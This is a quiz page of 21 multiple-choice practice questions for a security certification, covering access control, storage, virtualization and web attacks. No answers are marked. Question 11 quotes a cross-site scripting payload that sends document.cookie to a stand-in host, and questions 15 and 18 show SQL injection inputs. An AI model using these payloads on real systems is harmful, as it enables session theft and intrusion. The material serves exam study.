CASSIE 1-25

Description

My Cassie
Luis EZ
Quiz by Luis EZ, updated more than 1 year ago
Luis EZ
Created by Luis EZ over 7 years ago
28
0

Resource summary

Question 1

Question
An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions. Which of the following would BEST accomplish this?
Answer
  • Access control lists
  • SELinux
  • IPtables firewall
  • HIPS

Question 2

Question
Company ABC’s SAN is nearing capacity, and will cause costly downtimes if servers run out disk space. Which of the following is a more cost effective alternative to buying a new SAN?
Answer
  • Enable multipath to increase availability
  • Enable deduplication on the storage pools
  • Implement snapshots to reduce virtual disk size
  • Implement replication to offsite datacenter

Question 3

Question
A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. The security authentication on the Windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the UNIX share. Which of the following settings on the UNIX server would correct this problem?
Answer
  • Refuse LM and only accept NTLMv2
  • Accept only LM
  • Refuse NTLMv2 and accept LM
  • Accept only NTLM

Question 4

Question
A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition to the normal complement of security controls (e.g. antivirus, host hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on the VMs. Which of the following will meet this goal without requiring any hardware pass-through implementations?
Answer
  • vTPM
  • HSM
  • TPM
  • INE

Question 5

Question
A user has a laptop configured with multiple operating system installations. The operating systems are all installed on a single SSD, but each has its own partition and logical volume. Which of the following is the BEST way to ensure confidentiality of individual operating system data?
Answer
  • Encryption of each individual partition
  • Encryption of the SSD at the file level
  • FDE of each logical volume on the SSD
  • FDE of the entire SSD as a single disk

Question 6

Question
After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following piece of code used by a web based shopping cart. SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT); The programmer found that every time a user adds an item to the cart, a temporary file is created on the web server /tmp directory. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MM-DDYYYY, (e.g. smartphone-12-25-2013.tmp) containing the price of the item being purchased. Which of the following is MOST likely being exploited to manipulate the price of a shopping cart’s items?
Answer
  • Input validation
  • SQL injection
  • TOCTOU
  • Session hijacking

Question 7

Question
The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. The single controller in the storage array has failed, so the administrator wants to move the drives to a storage array from a different manufacturer in order to access the data. Which of the following issues may potentially occur?
Answer
  • The data may not be in a usable format.
  • The new storage array is not FCoE based.
  • The data may need a file system check.
  • The new storage array also only has a single controller.

Question 8

Question
Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim’s privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the following BEST describes the application issue?
Answer
  • Integer overflow
  • Click-jacking
  • Race condition
  • SQL injection
  • Use after free
  • Input validation

Question 9

Question
A developer is determining the best way to improve security within the code being developed. The developer is focusing on input fields where customers enter their credit card details. Which of the following techniques, if implemented in the code, would be the MOST effective in protecting the fields from malformed input?
Answer
  • Client side input validation
  • Stored procedure
  • Encrypting credit card details
  • Regular expression matching

Question 10

Question
A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no IPv6 routing into or out of the network. Which of the following is the BEST course of action?
Answer
  • Investigate the network traffic and block UDP port 3544 at the firewall
  • Remove the system from the network and disable IPv6 at the router
  • Locate and remove the unauthorized 6to4 relay from the network
  • Disable the switch port and block the 2001::/32 traffic at the firewall

Question 11

Question
A security administrator notices the following line in a server's security log: <input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</scri pt>') + "'; The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?
Answer
  • WAF
  • Input validation
  • SIEM
  • Sandboxing
  • DAM

Question 12

Question
A popular commercial virtualization platform allows for the creation of virtual hardware. To virtual machines, this virtual hardware is indistinguishable from real hardware. By implementing virtualized TPMs, which of the following trusted system concepts can be implemented?
Answer
  • Software-based root of trust
  • Continuous chain of trust
  • Chain of trust with a hardware root of trust
  • Software-based trust anchor with no root of trust

Question 13

Question
An organization is concerned with potential data loss in the event of a disaster, and created a backup datacenter as a mitigation strategy. The current storage method is a single NAS used by all servers in both datacenters. Which of the following options increases data availability in the event of a datacenter failure?
Answer
  • Replicate NAS changes to the tape backups at the other datacenter.
  • Ensure each server has two HBAs connected through two routes to the NAS.
  • Establish deduplication across diverse storage paths.
  • Establish a SAN that replicates between datacenters.

Question 14

Question
An application present on the majority of an organization’s 1,000 systems is vulnerable to a buffer overflow attack. Which of the following is the MOST comprehensive way to resolve the issue?
Answer
  • Deploy custom HIPS signatures to detect and block the attacks.
  • Validate and deploy the appropriate patch.
  • Run the application in terminal services to reduce the threat landscape.
  • Deploy custom NIPS signatures to detect and block the attacks.

Question 15

Question
select id, firstname, lastname from authors User input= firstname= Hack;man lastname=Johnson Which of the following types of attacks is the user attempting?
Answer
  • XML injection
  • Command injection
  • Cross-site scripting
  • SQL injection

Question 16

Question
A government agency considers confidentiality to be of utmost importance and availability issues to be of least importance. Knowing this, which of the following correctly orders various vulnerabilities in the order of MOST important to LEAST important?
Answer
  • Insecure direct object references, CSRF, Smurf
  • Privilege escalation, Application DoS, Buffer overflow
  • SQL injection, Resource exhaustion, Privilege escalation
  • CSRF, Fault injection, Memory leaks

Question 17

Question
A security administrator wants to deploy a dedicated storage solution which is inexpensive, can natively integrate with AD, allows files to be selectively encrypted and is suitable for a small number of users at a satellite office. Which of the following would BEST meet the requirement?
Answer
  • SAN
  • NAS
  • Virtual SAN
  • Virtual storage

Question 18

Question
A developer has implemented a piece of client-side JavaScript code to sanitize a user’s provided input to a web page login screen. The code ensures that only the upper case and lower case letters are entered in the username field, and that only a 6-digit PIN is entered in the password field. A security administrator is concerned with the following web server log: 10.235.62.11 – - [02/Mar/2014:06:13:04] “GET /site/script.php?user=admin&pass=pass%20or%201=1 HTTP/1.1” 200 5724 Given this log, which of the following is the security administrator concerned with and which fix should be implemented by the developer?
Answer
  • The security administrator is concerned with nonprintable characters being used to gain administrative access, and the developer should strip all nonprintable characters.
  • The security administrator is concerned with XSS, and the developer should normalize Unicode characters on the browser side.
  • The security administrator is concerned with SQL injection, and the developer should implement server side input validation.
  • The security administrator is concerned that someone may log on as the administrator, and the developer should ensure strong passwords are enforced.

Question 19

Question
The risk manager has requested a security solution that is centrally managed, can easily be updated, and protects end users' workstations from both known and unknown malicious attacks when connected to either the office or home network. Which of the following would BEST meet this requirement?
Answer
  • HIPS
  • UTM
  • Antivirus
  • NIPS
  • DLP

Question 20

Question
Which of the following describes a risk and mitigation associated with cloud data storage?
Answer
  • Risk: Shared hardware caused data leakage Mitigation: Strong encryption at rest
  • Risk: Offsite replication Mitigation: Multi-site backups
  • Risk: Data loss from de-duplication Mitigation: Dynamic host bus addressing
  • Risk: Combined data archiving Mitigation: Two-factor administrator authentication

Question 21

Question
An insurance company is looking to purchase a smaller company in another country. Which of the following tasks would the security administrator perform as part of the security due diligence?
Answer
  • Review switch and router configurations
  • Review the security policies and standards
  • Perform a network penetration test
  • Review the firewall rule set and IPS logs
Show full summary Hide full summary

Similar

21 Random IT questions
Eden Goddard
USA and Vietnam (1964-1975) - Part 1
Lewis Appleton-Jones
GCSE REVISION TIMETABLE
rebekahanne11
Jane Eyre
sennahlee
Plant and animal cells
Tyra Peters
Geography Tourism
lauramarypowell
Think Python
tsilvo2001
Forces and motion
Catarina Borges
An Inspector Calls Revision Notes
Noor Sohail
Flashcards for CPXP exam
Lydia Elliott, Ed.D
An Inspector Calls - Quotes and Context
James Holder